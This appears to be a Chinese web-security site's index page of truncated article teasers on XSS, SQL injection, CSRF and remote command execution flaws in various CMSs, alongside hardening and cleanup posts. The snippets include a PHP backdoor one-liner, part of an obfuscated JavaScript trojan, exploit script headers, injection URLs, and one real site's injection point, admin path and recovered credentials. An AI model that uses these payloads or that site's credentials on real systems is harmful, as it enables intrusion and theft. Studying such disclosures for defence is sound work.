sa权限cmd执行返回命令行提示已关闭的解决办法关注热度:35

sa权限，用xp_cmdshell执行cmd但是返回命令行提示已关闭然后又试了试其他存储OA，job，沙盒什么的全部玩了一圈下来，照样不能执行命令,很无奈啊，遇见个变态sa试试了sp_makewebtask存储，还..[详情]

新浪轻博客跨站及修复 - 网站安全 - 自学php关注热度:24

新浪轻博客在发布音乐时，对音乐封面图片URL过滤不严，导致跨站。详细说明：新浪轻博客在发布音乐时，正常的提交请求为：但是其screen参数过滤不严，修改参数如下提交，即可导致..[详情]

凤凰快博多枚XSS 向存储型变异(含修复方案) - 网关注热度:29

简要描述：XSS过滤不严格以及设计存在问题，顺便庆祝一下乌云重新开张以及提前祝贺各位春节愉快！详细说明：多枚，如图：漏洞证明：向存储型构造：第一个条件：发现CKEDITOR编辑器..[详情]

避开XSS过滤常用方法 - 网站安全 - 自学php关注热度:24

0x01 许多过滤匹配特殊的标签，包括起始与结束尖括号。但是，许多浏览器接受结束括号前的空白符，允许攻击者轻易避开这种过滤。例如：script 0x02 因为许多人用小写字符编写HTML代码..[详情]

ImgPals Photo Host Version 1.0管理账号失效缺陷及修复关注热度:17

ImgPals Photo Host Version 1.0 STABLE作者: Corrado Liotta Aka CorryL程序: ImgPals Photo Host影响版本: 1.0 STABLE开发这网站: http://www.imgpals.com/forum/运行平台: Windows\Linux\Uni.....[详情]

wordpress木马解决方法之实战记录 - 网站安全 - 自关注热度:15

今早正常打开网站后发现首页偏左后，第一反应该查看源码后发现，页面被挂上了JS马：scriptif(window.document)a=(v532b5.indexOf+Date).substr(0,6);aa=([1,2,3][#39;reverse#39;]+[].reverse).substr(0,6.....[详情]

如何对Web服务器做压力测试 - 网站安全 - 自学p关注热度:21

公司的Web服务器搭建完成，上线在即。它能够承载多大的访问量，响应速度和容错能力等性能指标是否满足要求，所有这些都是我最想知道，也最为担心的。如何才能知晓这一切呢？通..[详情]

Topics Viewer CSRF 添加管理员 - 网站安全 - 自学php关注热度:23

标题: Topics viewer CSRF Add Admin作者: The Green Hornet www.2cto.com thegreenhornet95@gmail.com软件下载地址：http://www.traidnt.net/Portal/Sites/Scripts/topics-viewer-v2.0-beta-1-traidn.....[详情]

一个官方没有公布的php秘籍，可被用作后门 - 网关注热度:22

发现这个也是巧合，我就直接说了吧?php//t.php $test = $_GET[#39;r#39;]; echo `$test`; ?大家看看这个代码有木有问题？我想大家都会说没有问题，但是细心的朋友也会发现下面的变量被一个符号包..[详情]

ContaoCMS (aka TYPOlight) <= 2.11 CSRF (删除管理员/删除关注热度:22

标题: ContaoCMS (aka TYPOlight) = 2.11 CSRF (Delete Admin- Delete Article)作者: Ivano Binetti (http://ivanobinetti.com)下载地址: http://www.contao.org/en/download.html开发这网站: h.....[详情]

WebfolioCMS <= 1.1.4 CSRF (添加管理员/修改页面)及修关注热度:20

标题: WebfolioCMS = 1.1.4 CSRF (Add Admin/Modify Pages)作者: Ivano Binetti (http://ivanobinetti.com)下载地址: http://sourceforge.net/projects/webfolio-cms/files/WebfolioCMS-1.1.4.zip/d.....[详情]

Bypassing Web Application Firewalls with SQLMap Tamper Scrip关注热度:32

Web Application Firewalls have become the new security solution for several businesses. Many companies often ignore the actual vulnerabilities and merely rely on the firewa.....[详情]

Faster Blind MySQL Injection Using Bit Shifting - 网站安全关注热度:22

#### http://h.ackack.net/faster-blind-mysql-injection-using-bit-shifting.html for a HTML version# Made by Jelmer de Hen# H.ackAck.net#####While strolling through mysql.com I came .....[详情]

MYSQL高版本报错注入技巧-利用NAME_CONST注入 - 网站关注热度:37

It#39;s been a while since I#39;ve made an SQL Injection tutorial, so I#39;d thought I should make a new tutorial using the method name_const. There#39;s not many pa.....[详情]

京东商城XSS及修复 - 网站安全 - 自学php关注热度:52

简要描述：由于京东商城Web应用程序对用户提交的数据没有严格过滤，导致XSS跨站脚本攻击漏洞形成，可能导致盗取用户信息或钓鱼攻击等恶意行为。详细说明：http://notify.home.360buy.co..[详情]

九思软件iThink OA系统编辑器上传漏洞及修复关注热度:503

九思软件自主研发的iThink协同OA办公自动化系统是面向中高端企业、政府机关和事业单位、等大型企业的协同办公软件，面向集团化、多元化、国际化和大型政府机构，针对其异地管理、..[详情]

Xss Exploits and Defense翻译4 - 网站安全 - 自学php关注热度:20

前三篇地址：http://www.2cto.com/Article/201202/120835.html快速回顾XSS的历史Oslash; XSS很早就在网上存在。Oslash; 1999年，Georgi Guninski和David Ross联合发表了第一篇关于XSS威胁标题为脚本注入的.....[详情]

Dotclear 2.4.2任意文件上传缺陷及修复 - 网站安全关注热度:23

标题: dotclear-2.4.2 (Swf) File Upload Vulnerability作者: T0x!c www.2cto.com Malik_99@hotmail.fr程序下载地址: http://fr.dotclear.org/download影响版本: 2.4.2测试系统: [Windows Xp]测试证.....[详情]

YVS Image Gallery Sql注射及修复 - 网站安全 - 自学p关注热度:20

应用程序: YVS Image Gallery影响版本: 0.0.0.1开发者网站: http://yvs.vacau.com/gallery.html测试平台: Windows\Linux\Unix缺陷类型: Sql INJECTIONS利用: Remote作者: Corrado Liotta Aka Corry.....[详情]

Clickjacking和XSS结合的攻击艺术 - 网站安全 - 自学关注热度:18

-----[ 0x01: 简介]Clickjacking攻击来自一个最近发现的两个研究人员杰里格罗斯曼和罗伯特RSnake汉森。这是一个相当简单而有效的攻击。我们会迅速分析如何将两种不同的XSS和Clickjacking结合在..[详情]

为了dede系统安全把data目录迁移到web以外目录 -关注热度:20

data目录是系统缓存和配置文件的目录,一般都有可以读写的权限，只要是能够写入的目录都可能存在安全隐患，很多站长甚至给予这个目录可执行的权限，更是非常危险,所以我们建议将..[详情]

CreateVision CMS数据库注射 - 网站安全 - 自学php关注热度:11

#!/usr/local/bin/perl## Exploit Title: CreateVision CMS Database injection.# Description: Virtually none of the variables are not filtered.# Google Dork: inurl:artykul_print.php#.....[详情]

webgrind 1.0 (file param)本地文件包含缺陷及修复 - 网关注热度:17

标题：webgrind 1.0 (file param) Local File Inclusion Vulnerability作者: Joakim Nygard and Jacob Oettinger开发者: http://code.google.com/p/webgrind影响版本: 1.0 (v1.02 in trunk on.....[详情]

cPassMan v1.82远程命令执行 - 网站安全 - 自学php关注热度:12

产品：Collaborative Passwords Manager (cPassMan)平台：Independent (PHP)影响版本： 1.82?php/** cPassMan v1.82 Remote Command Execution Exploit by ls (contact@kaankivilcim.com)* Disc.....[详情]

PHP Gift Registry 1.5.5 sql注射及修复 - 网站安全 - 自关注热度:20

标题: PHP Gift Registry 1.5.5 SQL Injection作者: G13下载地址: https://sourceforge.net/projects/phpgiftreg/影响版本: 1.5.5程序: webapps (php)缺陷描述users.ph文件的userid参数输入存在sql注.....[详情]

关于Macromedia Dreamweaver Remote Database Scripts这个漏洞关注热度:63

今天扫到一个这样的漏洞，在网上搜了半天没发现有利用方法所以找啊找文件，终于找到。。MMHTTPDB.php:?phpif(extension_loaded(mbstring)){ $acceptCharsetHeader = Accept-Charset: . mb_internal_.....[详情]

creasant digital CMS注入及获取webshell - 网站安全 - 自关注热度:56

用萝卜头注入获得账户密码分别为wood,27258558,注入地址为http://www.cclivingword.net/simp/news.php?news_id=39后台地址为http://www.cclivingword.net/admin/index.php说说后台拿webshell，点浏览上传，完了点.....[详情]

phpDenora <= 1.4.6多个sql注射缺陷及修复 - 网站安关注热度:20

标题: phpDenora = 1.4.6 Multiple SQL Injection Vulnerabilities作者: P. de Brouwer - KnickLighter设计软件下载地址: phpDenora = 1.4.6http://sourceforge.net/projects/phpdenora/files/.....[详情]

SQL注入技巧-绕过 "Illegal mix of collations" 错关注热度:76

Immediately started counting the columns:Code:http://www.2cto.com /news_dett.php?id=30+ORDER+BY+9--column 9 we have the error SQL Error : Unknown column #39;9#39; in #39;orde.....[详情]

MangosWeb POST型SQL注入实战 - 网站安全 - 自学php关注热度:73

First off download FireFox, and an add on called Tamper Data.i use MangosWeb SQLi 0-DayCode:http://wowfaction.selfip.com/wow/Now POST SQL Injection can be done via seach box.....[详情]